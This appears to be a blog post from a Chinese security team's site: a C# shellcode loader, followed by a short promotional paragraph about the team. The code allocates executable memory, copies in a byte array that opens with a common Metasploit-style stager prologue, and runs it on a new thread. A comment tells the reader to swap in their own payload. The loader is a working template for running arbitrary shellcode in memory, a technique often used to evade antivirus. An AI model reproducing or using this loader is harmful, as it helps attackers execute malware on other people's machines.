using System;using System.Runtime.InteropServices;namespace testIEexec{    class Program    {        private static UInt32 MEM_COMMIT = 0x1000;        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;        private static UInt32 MEM_RELEASE = 0x8000;        public static void Main(string[] args)        {            // 替换下面数组中的内容            byte[] proc = new byte[894] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00,............. };            UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);            Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length);            IntPtr hThread = IntPtr.Zero;            UInt32 threadId = 0;            // prepare data             PROCESSOR_INFO info = new PROCESSOR_INFO();            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));            Marshal.StructureToPtr(info, pinfo, false);            // execute native code             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);            WaitForSingleObject(hThread, 0xFFFFFFFF);            // retrive data             info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));            Marshal.FreeHGlobal(pinfo);            CloseHandle(hThread);            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);        }        [DllImport("kernel32")]        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);        [DllImport("kernel32")]        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);        [DllImport("kernel32")]        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);        [DllImport("kernel32")]        private static extern bool CloseHandle(IntPtr handle);        [DllImport("kernel32")]        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);        [DllImport("kernel32")]        private static extern IntPtr GetModuleHandle(string moduleName);        [DllImport("kernel32")]        private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);        [DllImport("kernel32")]        private static extern UInt32 LoadLibrary(string lpFileName);        [DllImport("kernel32")]        private static extern UInt32 GetLastError();        [StructLayout(LayoutKind.Sequential)]        internal struct PROCESSOR_INFO        {            public UInt32 dwMax;            public UInt32 id0;            public UInt32 id1;            public UInt32 id2;            public UInt32 dwStandard;            public UInt32 dwFeature;            // if AMD             public UInt32 dwExt;        }    }}

Tide安全团队正式成立于2019年1月，是新潮信息旗下以互联网攻防技术研究为目标的安全团队，团队致力于分享高质量原创文章、开源安全工具、交流安全技术，研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号：